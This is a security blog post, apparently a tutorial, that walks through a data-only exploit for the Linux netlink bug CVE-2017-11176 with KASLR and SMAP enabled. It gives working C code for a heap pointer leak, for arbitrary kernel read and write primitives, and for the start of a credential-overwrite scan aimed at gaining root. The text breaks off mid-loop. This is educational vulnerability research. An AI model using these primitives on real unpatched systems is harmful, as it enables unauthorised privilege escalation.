Revisiting CVE-2017-11176

Posted on Apr 17, 2023 | Author: Nils Ole Timm

In this post we deviate a bit from the typical format of posts on our blog and try to provide some introductory material on Android/Linux kernel exploitation.

Instead of starting from zero, we’ll base this post on Nicolas Fabretti’s excellent series of blog posts about CVE-2017-11176. We assume that you’ve read at least up to part 3 of the original series; if you have trouble following along, we suggest revisiting it.

We will aim to exploit the same issue, but without any of the simplifying assumptions made in the original blog posts. In particular, we deviate from the control flow takeover exploit strategy used by Nicolas and instead implement a different, data-only, exploit strategy, which is still viable with KASLR and SMAP enabled.

With this post we hope to help people who already understand the basics take their next step towards more modern exploit strategies.

Background

So, why is control flow takeover not really viable anymore?

To be honest, that’s a bit of a lie. You can still do control flow takeover (unless the system is specifically hardened against it). It’s just a lot harder with KASLR and almost impossible with CFI (Control Flow Integrity), although the latter isn’t (yet) commonly deployed.

It feels a bit like learning how to do stack-based buffer overflows with shellcode, right before the introduction of NX/DEP.

So what changes?

Firstly, I didn’t want to assume that KASLR (Kernel Address Space Layout Randomisation) is off.
In the blog posts, nokaslr is added to the boot command line to enforce that assumption. Ironically enough, the 3.16 Debian image recommended in the blog post doesn’t even support KASLR, so even without the option it won’t be running with KASLR.
I will still avoid hardcoding absolute addresses in my exploit, so really I’ll be pretending that KASLR is on.

Secondly, the blog post assumes that SMAP (Supervisor Mode Access Prevention) is off.
Again, this is enforced by adding the nosmap option to the boot command line.
With SMAP enabled, the kernel cannot access data in user mode memory, except through dedicated accessors such as copy_from_user and copy_to_user.

Effectively, this means that any data structures we want the kernel to use actually need to be created in, or transferred to, kernel memory somehow.

Lastly, in the blog post the netlink_sock structure ends up in the kmalloc-1024 cache, but in the 3.16 kernel of the VM Nicolas recommends, the structure is unfortunately 1088 bytes. This means that, in practice, we have to cause an allocation of at least 1025 bytes to end up in the same cache as the socket, and we subsequently overwrite almost all of the original netlink_sock structure.
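To make the size argument concrete, here is a minimal sketch of the rounding involved. It assumes that requests above 256 bytes are served from power-of-two kmalloc caches; the function name kmalloc_cache_size and the 4 MiB cap are made up for this illustration and are not kernel code.

```c
#include <stddef.h>

/*
 * Simplified model (an assumption, not kernel code): for requests larger
 * than 256 bytes the general-purpose kmalloc caches are powers of two, so
 * an object lands in the smallest power-of-two cache that fits it.
 * Returns 0 for sizes this sketch does not model.
 */
size_t kmalloc_cache_size(size_t size)
{
    size_t cache = 512;

    /* Small caches are finer grained; huge requests are out of scope. */
    if (size <= 256 || size > ((size_t)1 << 22))
        return 0;
    while (cache < size)
        cache <<= 1;
    return cache;
}
```

Under this model a 1024-byte object stays in the 1024-byte cache, while both a 1025-byte request and the 1088-byte netlink_sock round up to 2048.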

Where do we deviate?

I personally deviated from the blog post series somewhere in the third part.

It’s hard to say where exactly, because there is a lot of analysis there which is still necessary and helpful even if you follow a different exploit strategy.

What I will call the point of deviation here is the Exploit (Reallocation) section in the third part.
The blog post uses sendmsg to cause controlled kernel allocations.

I’ve opted to use msg_msg, or more specifically msg_msgseg, structs instead. Here is an excellent blog post by Vitaly Nikolenko describing the primitive, although he ultimately proposes a better (but more complicated) one.
The primitive allows us to control all but the first 8 bytes of an allocation.
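The size of the message decides how large the msg_msgseg allocation is. The sketch below works out the message length for a desired segment allocation, assuming 4096-byte pages, a 48-byte msg_msg header in the first chunk and an 8-byte msg_msgseg header (the uncontrolled first 8 bytes). The constant and function names are illustrative only.

```c
#include <stddef.h>

#define PAGE_SIZE_ASSUMED 4096u  /* x86_64 page size */
#define MSG_MSG_HDR       48u    /* assumed sizeof(struct msg_msg) */
#define MSG_MSGSEG_HDR    8u     /* 'next' pointer, not under our control */

/*
 * Message text length needed so that the first msg_msgseg becomes an
 * allocation of exactly seg_alloc bytes, header included.
 * Returns 0 if seg_alloc cannot be produced by a single segment.
 */
size_t mtext_len_for_seg(size_t seg_alloc)
{
    if (seg_alloc <= MSG_MSGSEG_HDR || seg_alloc > PAGE_SIZE_ASSUMED)
        return 0;
    /* The first chunk is filled completely, the remainder spills into the segment. */
    return (PAGE_SIZE_ASSUMED - MSG_MSG_HDR) + (seg_alloc - MSG_MSGSEG_HDR);
}
```

With these assumptions, a segment that exactly covers the 1088-byte netlink_sock needs 5128 bytes of message text, and one that fills a whole 2048-byte slot needs 6088 bytes.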

Since my goal is to perform a data-only exploit, you might think that my first goal will be to find primitives for arbitrary read or arbitrary write in kernel memory. But since I’m assuming that KASLR is on, even with such a primitive I wouldn’t know where to read or write, so the first goal should be to find an address leak of any kind.

Finding a leak

We know from the original series of blog posts that the kernel uses the SLAB allocator, which makes it very easy to deterministically put a controlled msg_msgseg into the memory of the netlink_sock struct.

It’s very easy to trick yourself (like I did) into only thinking about how the type confusion lets you mess with the netlink_sock by altering the msg_msgseg. But it works in the other direction too: if we can get the kernel to set a pointer in the netlink_sock struct, we can read that pointer back by receiving the msg.

As a sidenote: it took me a few hours to come up with this leak, even if it might seem like an obvious thing when you just read the blog post.

So, let’s take another look at netlink_setsockopt. Nicolas goes through it relatively thoroughly in part 2 of his series, but does it all in the context of unblocking the socket.
But this time we’re looking at it under a different premise, namely finding some way to obtain a kernel address. Since the netlink_sock struct is 1088 bytes in this kernel, we unfortunately have to overwrite almost the entirety of the struct to end up in the right slab cache; otherwise we might have been able to read pre-existing data. This means that we probably need something to update a pointer for us.

In the code below we can (and also unfortunately must) fully control the data nlk points to.

static int netlink_setsockopt(struct socket *sock, int level, int optname,
                  char __user *optval, unsigned int optlen)
{
    struct sock *sk = sock->sk;
    struct netlink_sock *nlk = nlk_sk(sk);
    unsigned int val = 0;
    int err;
 
    if (level != SOL_NETLINK)
        return -ENOPROTOOPT;
 
    if (optname != NETLINK_RX_RING && optname != NETLINK_TX_RING &&
        optlen >= sizeof(int) &&
        get_user(val, (unsigned int __user *)optval))
        return -EFAULT;
 
    switch (optname) {
    case NETLINK_PKTINFO:
        if (val)
            nlk->flags |= NETLINK_RECV_PKTINFO;
        else
            nlk->flags &= ~NETLINK_RECV_PKTINFO;
        err = 0;
        break;
    case NETLINK_ADD_MEMBERSHIP:
    case NETLINK_DROP_MEMBERSHIP: {
        if (!netlink_allowed(sock, NL_CFG_F_NONROOT_RECV))
            return -EPERM;
        err = netlink_realloc_groups(sk);
        if (err)
            return err;
        if (!val || val - 1 >= nlk->ngroups)
            return -EINVAL;
        if (optname == NETLINK_ADD_MEMBERSHIP && nlk->netlink_bind) {
            err = nlk->netlink_bind(val);
            if (err)
                return err;
        }
        netlink_table_grab();
        netlink_update_socket_mc(nlk, val,
                     optname == NETLINK_ADD_MEMBERSHIP);
        netlink_table_ungrab();
        if (optname == NETLINK_DROP_MEMBERSHIP && nlk->netlink_unbind)
            nlk->netlink_unbind(val);
 
        err = 0;
        break;
    }
    [...]

You’ve probably noticed netlink_realloc_groups on line 29. For now, let’s just assume that it does what it says on the tin and assigns a freshly allocated pointer to nlk->groups.
We can reach that code path by passing SOL_NETLINK and NETLINK_DROP_MEMBERSHIP.
That leaves one more potential obstacle on the way, namely the netlink_allowed check.

static inline int netlink_allowed(const struct socket *sock, unsigned int flag)
{
    return (nl_table[sock->sk->sk_protocol].flags & flag) ||
        ns_capable(sock_net(sock->sk)->user_ns, CAP_NET_ADMIN);
}

Luckily, the check operates on a protocol level first. And since we fully control the sk_protocol value, we can pick any protocol that has the NL_CFG_F_NONROOT_RECV flag set. (That turns out to be a good chunk of them, so 0 works too.)

This means we can definitely trigger netlink_realloc_groups, even on our corrupted netlink_sock.
Before we jump into the details of that function, note how lines 32 and 33 of netlink_setsockopt give us a nice and easy way to leave the function early. This means we don’t have to worry about our corrupted netlink_sock causing a crash somewhere later in the function. We fully control the value of val, since it comes from user memory.

Let’s take a closer look at netlink_realloc_groups now.

static int netlink_realloc_groups(struct sock *sk)
{
    struct netlink_sock *nlk = nlk_sk(sk);
    unsigned int groups;
    unsigned long *new_groups;
    int err = 0;
 
    netlink_table_grab();
 
    groups = nl_table[sk->sk_protocol].groups;
    if (!nl_table[sk->sk_protocol].registered) {
        err = -ENOENT;
        goto out_unlock;
    }
 
    if (nlk->ngroups >= groups)
        goto out_unlock;
 
    new_groups = krealloc(nlk->groups, NLGRPSZ(groups), GFP_ATOMIC);
    if (new_groups == NULL) {
        err = -ENOMEM;
        goto out_unlock;
    }
    memset((char *)new_groups + NLGRPSZ(nlk->ngroups), 0,
           NLGRPSZ(groups) - NLGRPSZ(nlk->ngroups));
 
    nlk->groups = new_groups;
    nlk->ngroups = groups;
 out_unlock:
    netlink_table_ungrab();
    return err;
}

There really isn’t too much to look at here. What’s important to check is that we won’t crash and that a value actually gets assigned in our corrupted netlink_sock, as we are hoping.

The two checks we need to get around are on lines 11 and 16, which is trivial since we fully control sk_protocol and ngroups.

After that the function does exactly what we were hoping. It (re)allocates nlk->groups and assigns the pointer.
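The effect on a zeroed struct can be replayed in user space. The following is a rough model, not kernel code: fake_nlk is a hypothetical stand-in for the two fields involved, realloc plays the role of krealloc, and proto_groups stands for nl_table[sk->sk_protocol].groups.

```c
#include <stdlib.h>
#include <string.h>

#define BITS_PER_LONG_MODEL (8 * sizeof(unsigned long))
/* Same rounding as the kernel's NLGRPSZ(): bytes needed for x group bits. */
#define NLGRPSZ_MODEL(x) \
    ((((x) + BITS_PER_LONG_MODEL - 1) / BITS_PER_LONG_MODEL) * sizeof(unsigned long))

struct fake_nlk {               /* hypothetical: only the fields used here */
    unsigned int ngroups;
    unsigned long *groups;
};

/* Mirrors the tail of netlink_realloc_groups(). Returns 0 or -1 (no memory). */
int model_realloc_groups(struct fake_nlk *nlk, unsigned int proto_groups)
{
    unsigned long *new_groups;

    if (nlk->ngroups >= proto_groups)
        return 0;               /* early out: pointer stays untouched */

    new_groups = realloc(nlk->groups, NLGRPSZ_MODEL(proto_groups));
    if (new_groups == NULL)
        return -1;
    /* Zero only the part that was added by the reallocation. */
    memset((char *)new_groups + NLGRPSZ_MODEL(nlk->ngroups), 0,
           NLGRPSZ_MODEL(proto_groups) - NLGRPSZ_MODEL(nlk->ngroups));

    nlk->groups = new_groups;
    nlk->ngroups = proto_groups;
    return 0;
}
```

Starting from an all-zero struct (groups NULL, ngroups 0), any protocol with at least one group ends with a fresh heap pointer stored in groups, which is exactly the value we want to read back later.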

Triggering the leak

So our plan is relatively simple.
We allocate a msg_msgseg full of 0 bytes into the memory of the socket.
Then we call setsockopt on the corrupted netlink_sock with SOL_NETLINK and NETLINK_DROP_MEMBERSHIP. The value we supply must be 0 to trigger the early out.
(Really any value will do, since the later parts of netlink_setsockopt won’t crash anyway; it’s just more effort to verify.)
At this point the nlk->groups pointer should have been updated, so if we receive the message we used to spray, we can read out the pointer that was set.

As mentioned in the beginning, I am using the msg_msgseg primitive. I’ve wrapped it in a controlled_kmalloc function.
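The wrapper itself is not shown in this post. As a rough idea of what such a helper could look like, here is a hypothetical spray_msg built on msgsnd. The name, the signature and the choice to set mtype to the payload length (which mirrors how msg_size is passed as msgtyp to msgrcv later on) are assumptions, not the actual controlled_kmalloc.

```c
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

/* Layout expected by msgsnd(): a long type followed by the payload. */
struct spray_buf {
    long mtype;
    char mtext[];
};

/*
 * Hypothetical stand-in for controlled_kmalloc(): queue len bytes of
 * payload on msq_id so the kernel copies them into msg_msg/msg_msgseg
 * allocations. Returns 0 on success, -1 on error.
 */
int spray_msg(int msq_id, const void *payload, size_t len)
{
    struct spray_buf *msg;
    int ret;

    if (len == 0)
        return -1;
    msg = malloc(sizeof(*msg) + len);
    if (msg == NULL)
        return -1;
    msg->mtype = (long)len;      /* must be > 0; reused as msgtyp on receive */
    memcpy(msg->mtext, payload, len);
    ret = msgsnd(msq_id, msg, len, IPC_NOWAIT);
    free(msg);
    return ret;
}
```

The queue would come from msgget(IPC_PRIVATE, IPC_CREAT | 0600). The leak function that follows uses the post’s own controlled_kmalloc, not this sketch.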

void* leak_heap_kptr(int sock_fd)
{
    char buf[8192];
    memset(buf,0, sizeof(buf));
    //Should end up in memory of netlink_sock
    int opt = 0;
    controlled_kmalloc(buf, msg_size);
    if(setsockopt(sock_fd, SOL_NETLINK, NETLINK_DROP_MEMBERSHIP, &opt, sizeof(int))<0)
    {
        if(errno!=EINVAL)
        {
            perror("[-] Drop membership failed:");
            return 0;
        }
    }
    msgrcv(msq_id, buf, msg_size,msg_size,IPC_NOWAIT);
    controlled_kmalloc(buf, msg_size);
    void** pbuf = (void**)buf;
    return pbuf[0x253];
}

Line 7 performs the allocation that sets all the values in the netlink_sock struct.
Line 8 calls setsockopt, so that nlk->groups will be set in our msg.
Line 16 receives the message, so that we can read out what the value of the pointer was.
Line 17 immediately retakes the same memory. This is very important, since we want to minimize the amount of time in which the memory is free. The smaller that timing window is, the less likely it becomes that another process causes an allocation that ends up in that memory, which would likely lead to a crash.
(You can circumvent this issue using MSG_COPY in this case, but it muddies the main point a little and depends on a specific kernel compile flag.)
Line 19 returns the leaked pointer.

I won’t go into how to work out that offset, since Nicolas does an excellent job in the original series, offering 5 different methods to work it out.

Giving this a try, it turns out that it actually works.

[+] Leaked heap kptr: 0xffff8800da96cf40
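The index 0x253 used in leak_heap_kptr can be cross-checked with a little arithmetic. This sketch assumes that nlk->groups sits 0x2c8 bytes into the struct (taken from the systemtap dump shown later in this post), the same 4096-48-8 layout that arbitrary_write relies on, and an 8-byte mtype at the start of the receive buffer. The function name is made up for illustration.

```c
#include <stddef.h>

#define PAGE_SIZE_ASSUMED 4096u
#define MSG_MSG_HDR       48u   /* header in front of the first data chunk */
#define MSG_MSGSEG_HDR    8u    /* header in front of the segment data */
#define MTYPE_SIZE        8u    /* long mtype preceding the text in the buffer */
#define POINTER_SIZE      8u    /* x86_64 */

/*
 * Index into the receive buffer, viewed as an array of pointers, of the
 * field located field_off bytes into the overlapped netlink_sock.
 */
size_t recv_slot_for_field(size_t field_off)
{
    /* Bytes of message text before the field: the full first chunk plus
     * the part of the segment data in front of it. */
    size_t mtext_off = (PAGE_SIZE_ASSUMED - MSG_MSG_HDR) + (field_off - MSG_MSGSEG_HDR);

    return (MTYPE_SIZE + mtext_off) / POINTER_SIZE;
}
```

For field_off = 0x2c8 this gives (8 + 4048 + 704) / 8 = 595, which is 0x253.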

Arbitrary Read

So, with a leaked heap pointer we now have a good idea of where we might want to read memory from.
In the blog post Nicolas talks about netlink_getname, which handles the getsockname syscall for netlink sockets. He calls it an “uncontrolled read primitive”.
I won’t go into too much detail here, because he already does in the post.

static int netlink_getname(struct socket *sock, struct sockaddr *addr,
               int *addr_len, int peer)
{
    struct sock *sk = sock->sk;
    struct netlink_sock *nlk = nlk_sk(sk);
    DECLARE_SOCKADDR(struct sockaddr_nl *, nladdr, addr);
 
    nladdr->nl_family = AF_NETLINK;
    nladdr->nl_pad = 0;
    *addr_len = sizeof(*nladdr);
 
    if (peer) {
        nladdr->nl_pid = nlk->dst_portid;
        nladdr->nl_groups = netlink_group_mask(nlk->dst_group);
    } else {
        nladdr->nl_pid = nlk->portid;
        nladdr->nl_groups = nlk->groups ? nlk->groups[0] : 0;
    }
    return 0;
}

If you look carefully at line 17, you will notice that the pointer nlk->groups is actually dereferenced if it isn’t zero.

Since we control all of the memory in the netlink_sock struct, we can set nlk->groups to any value, which means if we set it to an arbitrary address we can read 4 bytes from there. This gives us a very neat fully controlled arbitrary read.

In fact, this code path is so resilient that I am taking very little care in my arbitrary read implementation.

unsigned int arbitrary_read(int sock_fd, void* src)
{
    char buf[8192];
    void** pbuf=(void**)buf;
    int i;
    for(i=0; i<1024; i++)
    {
        pbuf[i] = src;
    }
    //Free only immediately before allocating
    msgrcv(msq_id, dummyBuf, msg_size,msg_size,IPC_NOWAIT);
    controlled_kmalloc(buf, msg_size);
 
    struct sockaddr_nl val;
    socklen_t val_len = sizeof(val);
    getsockname(sock_fd, (struct sockaddr*)&val, &val_len);
    return val.nl_groups;
}

Lines 6-9 just fill the whole struct with pointers to the address I want to read.
Line 11 frees the last msg_msg from the queue, to free the memory inside netlink_sock.
Line 12 immediately retakes the memory, again to make the timing window where we can lose the race as small as possible.
Line 16 retrieves the read value by calling getsockname.
Line 17 finally returns val.nl_groups, which will be the value at the address we made nlk->groups point to.

Here you can see the output of the arbitrary read I use later on to dump the credentials before and after changing them.

Read before
00000007 000003e8 000003e8 000003e8 000003e8 000003e8 000003e8 000003e8 
000003e8 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
ffffffff 0000003f 00000000 00000000 14e17d00 ffff8802 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 db9dbf40 ffff8800
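Each call returns only 32 bits, so pointers such as the ones visible in the dump above have to be assembled from two reads. A minimal sketch of that step follows. The read32_fn callback and the fake_mem backend are hypothetical helpers that make the code testable in user space; in the exploit the callback would wrap arbitrary_read.

```c
#include <stdint.h>
#include <string.h>

/* Any 32-bit read primitive: ctx is passed through untouched. */
typedef uint32_t (*read32_fn)(void *ctx, uint64_t addr);

/* Combine two little-endian 32-bit reads into one 64-bit value. */
uint64_t read64(read32_fn rd, void *ctx, uint64_t addr)
{
    uint64_t lo = rd(ctx, addr);
    uint64_t hi = rd(ctx, addr + 4);

    return (hi << 32) | lo;
}

/* Hypothetical backend: a byte buffer pretending to live at 'base'. */
struct fake_mem {
    uint64_t base;
    const uint8_t *bytes;
    size_t len;
};

uint32_t fake_read32(void *ctx, uint64_t addr)
{
    const struct fake_mem *m = ctx;
    uint32_t v = 0;

    /* Out-of-range reads return 0 instead of faulting. */
    if (addr >= m->base && addr - m->base + 4 <= m->len)
        memcpy(&v, m->bytes + (addr - m->base), 4);
    return v;
}
```

Fed with the two words 14e17d00 ffff8802 from the dump, read64 yields 0xffff880214e17d00.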

Arbitrary Write

Unfortunately the arbitrary write is significantly more work to get right.
To find potential candidates I looked for other uses of nlk->groups, more specifically assignments to it.

Now there is one place that performs such an assignment, but that’s in netlink_bind, which performs a lot more operations both before and after. So let’s take a look at that.

static int netlink_bind(struct socket *sock, struct sockaddr *addr,
            int addr_len)
{
    struct sock *sk = sock->sk;
    struct net *net = sock_net(sk);
    struct netlink_sock *nlk = nlk_sk(sk);
    struct sockaddr_nl *nladdr = (struct sockaddr_nl *)addr;
    int err;
    long unsigned int groups = nladdr->nl_groups;
 
    if (addr_len < sizeof(struct sockaddr_nl))
        return -EINVAL;
 
    if (nladdr->nl_family != AF_NETLINK)
        return -EINVAL;
 
    /* Only superuser is allowed to listen multicasts */
    if (groups) {
        if (!netlink_allowed(sock, NL_CFG_F_NONROOT_RECV))
            return -EPERM;
        err = netlink_realloc_groups(sk);
        if (err)
            return err;
    }
 
    if (nlk->portid)
        if (nladdr->nl_pid != nlk->portid)
            return -EINVAL;
 
    if (nlk->netlink_bind && groups) {
        int group;
 
        for (group = 0; group < nlk->ngroups; group++) {
            if (!test_bit(group, &groups))
                continue;
            err = nlk->netlink_bind(group);
            if (!err)
                continue;
            netlink_unbind(group, groups, nlk);
            return err;
        }
    }
 
    if (!nlk->portid) {
        err = nladdr->nl_pid ?
            netlink_insert(sk, net, nladdr->nl_pid) :
            netlink_autobind(sock);
        if (err) {
            netlink_unbind(nlk->ngroups, groups, nlk);
            return err;
        }
    }
 
    if (!groups && (nlk->groups == NULL || !(u32)nlk->groups[0]))
        return 0;
 
    netlink_table_grab();
    netlink_update_subscriptions(sk, nlk->subscriptions +
                     hweight32(groups) -
                     hweight32(nlk->groups[0]));
    nlk->groups[0] = (nlk->groups[0] & ~0xffffffffUL) | groups;
    netlink_update_listeners(sk);
    netlink_table_ungrab();
 
    return 0;
}

Again we need to avoid crashes while we try to get to line 61, which would let us write 4 arbitrary bytes to an arbitrary address.
I’ll break the whole function down into parts to make it easier to follow along.

if (addr_len < sizeof(struct sockaddr_nl))
    return -EINVAL;
 
if (nladdr->nl_family != AF_NETLINK)
    return -EINVAL;

Passing the first two checks is trivial – we control both addr_len and nladdr->nl_family directly with our call to bind and they are only compared to constants.

/* Only superuser is allowed to listen multicasts */
if (groups) {
    if (!netlink_allowed(sock, NL_CFG_F_NONROOT_RECV))
        return -EPERM;
    err = netlink_realloc_groups(sk);
    if (err)
        return err;
}

Similar to before, this check can be passed, at least as far as having the correct permissions is concerned.
If netlink_realloc_groups actually triggers a reallocation, though, our fake pointer gets overwritten. For the eventual exploit chain we only need to write 0s, so this branch won’t ever actually be taken.
But if we want to consider this a truly arbitrary write, we should try to avoid the reallocation.
Luckily, we can just set nlk->ngroups to a large value to make the reallocation logic exit early.

See the following snippet from netlink_realloc_groups.

if (nlk->ngroups >= groups)
    goto out_unlock;

Back to netlink_bind. Next are a few checks related to making sure the binding state is correctly initialized.

if (nlk->portid)
    if (nladdr->nl_pid != nlk->portid)
        return -EINVAL;

We could just set nlk->portid to 0 to avoid this branch. This would, however, send us down a less favorable code path later on. We fully control both nlk->portid and the request’s nladdr->nl_pid, so passing this check is trivial again.

if (nlk->netlink_bind && groups) {
    int group;
 
    for (group = 0; group < nlk->ngroups; group++) {
        if (!test_bit(group, &groups))
            continue;
        err = nlk->netlink_bind(group);
        if (!err)
            continue;
        netlink_unbind(group, groups, nlk);
        return err;
    }
}

We can completely avoid this branch, by setting the function pointer nlk->netlink_bind to 0.

if (!nlk->portid) {
    err = nladdr->nl_pid ?
        netlink_insert(sk, net, nladdr->nl_pid) :
        netlink_autobind(sock);
    if (err) {
        netlink_unbind(nlk->ngroups, groups, nlk);
        return err;
    }
}

This is the branch we want to avoid by not letting nlk->portid be 0. Since we made nlk->portid nonzero and equal to nladdr->nl_pid to pass the earlier check, we can again completely avoid this branch.

if (!groups && (nlk->groups == NULL || !(u32)nlk->groups[0]))
    return 0;

We don’t want to exit here, since it would skip the assignment we are ultimately aiming for.
Fortunately we will only ever take this branch if the value at the address already is what we wanted to write. If groups isn’t 0, we never take this branch, and if groups is 0 then we only take this branch if nlk->groups[0] is also 0.
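The condition is small enough to model directly. In the sketch below, groups_ptr_null and current stand for nlk->groups == NULL and nlk->groups[0]; the function name is invented for this illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Model of the early return in netlink_bind():
 *   if (!groups && (nlk->groups == NULL || !(u32)nlk->groups[0])) return 0;
 * 'requested' is the value we want to write (nladdr->nl_groups).
 */
bool bind_returns_early(uint32_t requested, bool groups_ptr_null, uint64_t current)
{
    return !requested && (groups_ptr_null || !(uint32_t)current);
}
```

Writing 0 over a location that currently holds 0x3e8 does not return early, whereas writing 0 over a location whose low 32 bits are already 0 does. In that second case nothing is lost, because the target already holds the desired value.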

At this point, there are no more branches in this function, so unless we crash, the arbitrary write will be performed.

netlink_table_grab();
netlink_update_subscriptions(sk, nlk->subscriptions +
                 hweight32(groups) -
                 hweight32(nlk->groups[0]));
nlk->groups[0] = (nlk->groups[0] & ~0xffffffffUL) | groups;

netlink_table_grab only grabs a global lock and is completely independent of both the manipulated netlink_sock struct and our request input. netlink_update_subscriptions takes both the manipulated sock and additional values as inputs, so we need to check that we won’t crash. But that’s the last hurdle before our write is performed.

static void
netlink_update_subscriptions(struct sock *sk, unsigned int subscriptions)
{
    struct netlink_sock *nlk = nlk_sk(sk);
 
    if (nlk->subscriptions && !subscriptions)
        __sk_del_bind_node(sk);
    else if (!nlk->subscriptions && subscriptions)
        sk_add_bind_node(sk, &nl_table[sk->sk_protocol].mc_list);
    nlk->subscriptions = subscriptions;
}

Just from skimming the code, it looks like the conditional branches operate on lists. This would very likely cause crashes, unless we can forge valid forward and back pointers.

Reading the code a little more carefully, we realize that these operations are only performed when either the current or the updated value is 0, but not the other. In practice this means that we can just set nlk->subscriptions to a large value.
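To see which starting values are safe, the arithmetic can be replayed in user space. This is a sketch with made-up function names: hweight32_model is a portable replacement for the kernel’s hweight32, and the three parameters correspond to nlk->subscriptions, the requested groups value and the low 32 bits currently stored at the target.

```c
#include <stdbool.h>
#include <stdint.h>

/* Portable stand-in for the kernel's hweight32(): number of set bits. */
unsigned int hweight32_model(uint32_t w)
{
    unsigned int n = 0;

    for (; w; w &= w - 1)       /* clears the lowest set bit each round */
        n++;
    return n;
}

/* Value netlink_bind() passes to netlink_update_subscriptions(). */
uint32_t updated_subscriptions(uint32_t old, uint32_t requested, uint32_t current_low)
{
    return old + hweight32_model(requested) - hweight32_model(current_low);
}

/* True if either list operation in netlink_update_subscriptions() would run. */
bool touches_bind_list(uint32_t old, uint32_t updated)
{
    return (old && !updated) || (!old && updated);
}
```

Take the write of 0 over a uid of 0x3e8, which has six bits set. Starting from 0x10000 the result is 0xfffa and no list is touched. Starting from 0 the subtraction wraps around to a nonzero value and sk_add_bind_node would run, and starting from exactly 6 the result is 0 and __sk_del_bind_node would run. The nonzero starting value only has to avoid landing on exactly 0.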

The rest of netlink_bind doesn’t really operate at the sock level, so we aren’t at any real risk of crashing.

So, let’s summarize what we need to do to perform an arbitrary write.

Set up correct bind arguments. Specifically AF_NETLINK and sizeof(sockaddr_nl).
Set the request’s groups parameter (src_addr.nl_groups) to the desired value.
Set nlk->sk_protocol to a number that passes the netlink_allowed check (for example 9)
Set nlk->groups to the destination address.
Set nlk->ngroups to a large value to avoid reallocation.
Set nlk->portid and src_addr.nl_pid to the same value != 0.
Set nlk->subscriptions to some large value to avoid dangerous code paths in netlink_update_subscriptions.

So here is my code for the arbitrary write.

int arbitrary_write(int sockfd, void* dst, uint32_t val)
{
    memset(&src_addr, 0, sizeof(src_addr));
    //Set up correct request arguments
    src_addr.nl_family = AF_NETLINK;
    src_addr.nl_pid = getpid();
    src_addr.nl_groups = val;
     
    //Offsets worked out from systemtap output
    #define portid_off ((0xffff880200c292b0-0xffff880200c29000)/sizeof(uint64_t*))
    #define groups_off ((0xffff880200c292c8-0xffff880200c29000)/sizeof(uint64_t*))
    #define sk_protocol ((0x138)/sizeof(uint64_t))
 
    char buf[8192];
    //Make anything in nlk 0 unless overwritten here.
    memset(buf,0x0, sizeof(buf));
    //Pretend there's a netlink_struct at correct offset in msg_msg buffer.
    uint64_t* netlink_struct = (void*)buf+4096-48-8;
    //Set up state of nlk, so that we avoid unfortunate code paths.
    netlink_struct[portid_off] = getpid();
    netlink_struct[groups_off-1] = 0x0000000100000001;//subscriptions and ngroups
    netlink_struct[groups_off] = (uint64_t)dst;
    netlink_struct[sk_protocol] = 0x00000900; //Bitfield values. Setting sk_protocol to 9
    //Should end up in memory of netlink_sock
    //Only free immediately before reallocating
    msgrcv(msq_id, dummyBuf, msg_size,msg_size,IPC_NOWAIT);
    controlled_kmalloc(buf, msg_size);
    //Call to netlink_bind to trigger arbitrary write
    if(bind(sockfd, (struct sockaddr*)&src_addr, sizeof(src_addr))<0)
    {
        perror("Write bind");
        return -1;
    }
    return 0;
}

For the read I just filled the whole netlink_sock struct with the src address. But as you can see, such a crude approach wasn’t enough here. I modified the systemtap script from the original blog post to print out the addresses of the fields in the struct, so that I could identify the correct offsets. Here’s an example output:

-={ dump_netlink_sock: 0xffff880200c29000 }=-
- sk = 0xffff880200c29000
- sk->sk_rmem_alloc = 214272
- sk->sk_rcvbuf = 212992
- sk->sk_refcnt = 2
- &nlk->port_id = 0xffff880200c292b0
- &nlk->ngroups = 0xffff880200c292c4
- &nlk->groups = 0xffff880200c292c8
- nlk->state = 0

Other than that I mainly just put the list of requirements to make the write work into code.
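The macros in arbitrary_write boil down to two small calculations, sketched here with hypothetical helper names: turning an address from the systemtap dump into an index into a uint64_t view of the struct, and packing two adjacent 32-bit fields into one 64-bit slot.

```c
#include <stddef.h>
#include <stdint.h>

/* Index of the 8-byte slot that contains field_addr, relative to base_addr. */
size_t field_index(uint64_t field_addr, uint64_t base_addr)
{
    return (size_t)(field_addr - base_addr) / sizeof(uint64_t);
}

/* Two neighbouring 32-bit fields as one little-endian 64-bit slot:
 * 'low' is the field at the lower address. */
uint64_t pack_u32_pair(uint32_t low, uint32_t high)
{
    return ((uint64_t)high << 32) | low;
}
```

With the addresses from the dump, port_id maps to slot 86 and groups to slot 89. &nlk->ngroups (0x2c4) falls into the upper half of slot 88, which is why the code writes one 64-bit value to groups_off-1 and, going by its comment, covers subscriptions and ngroups in one go.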

Exploit Plan

I’m not going to go into a lot of detail here about the exploit plan. There are a lot of other writeups that explain different methods of going about that. This talk gives a small overview for example.

In short, I’m using prctl to set the comm field in my task struct, so that I can identify it in memory through the arbitrary read. The comm field is immediately preceded by both real_cred and cred.

So, once the comm field is found in memory, we can follow these pointers and overwrite the uids and gids in the creds struct, to become root.

This approach is relatively crude and not particularly reliable, but it’s easy to understand and thus a nice way to demonstrate the concepts in this blog post.
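Setting the marker could look roughly like this. It is a sketch under assumptions: the function name, the alphabet and the seeding are invented here, and only the use of prctl with PR_SET_NAME is taken from the description above.

```c
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>

#define COMM_LEN 16   /* comm holds 15 characters plus the terminating NUL */

/*
 * Fill 'out' with nchars pseudo-random letters and install it as the
 * comm of the calling thread. Returns 0 on success, -1 on error.
 */
int set_comm_marker(char out[COMM_LEN], size_t nchars, unsigned int seed)
{
    static const char alphabet[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    size_t i;

    if (nchars == 0 || nchars >= COMM_LEN)
        return -1;
    srand(seed);
    for (i = 0; i < nchars; i++)
        out[i] = alphabet[(size_t)rand() % (sizeof(alphabet) - 1)];
    out[nchars] = '\0';
    return prctl(PR_SET_NAME, (unsigned long)out, 0, 0, 0);
}
```

A 12-character marker, like the one in the example output further down, gives three 32-bit words to compare against during the scan.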

for(i=0;i<SCAN_RANGE; i++)
{
    uint32_t val = arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4);
    if(val==*(uint32_t*)pattern)
    {
        printf("Found comm candidate at: %p\n", heap_kptr+i*4);
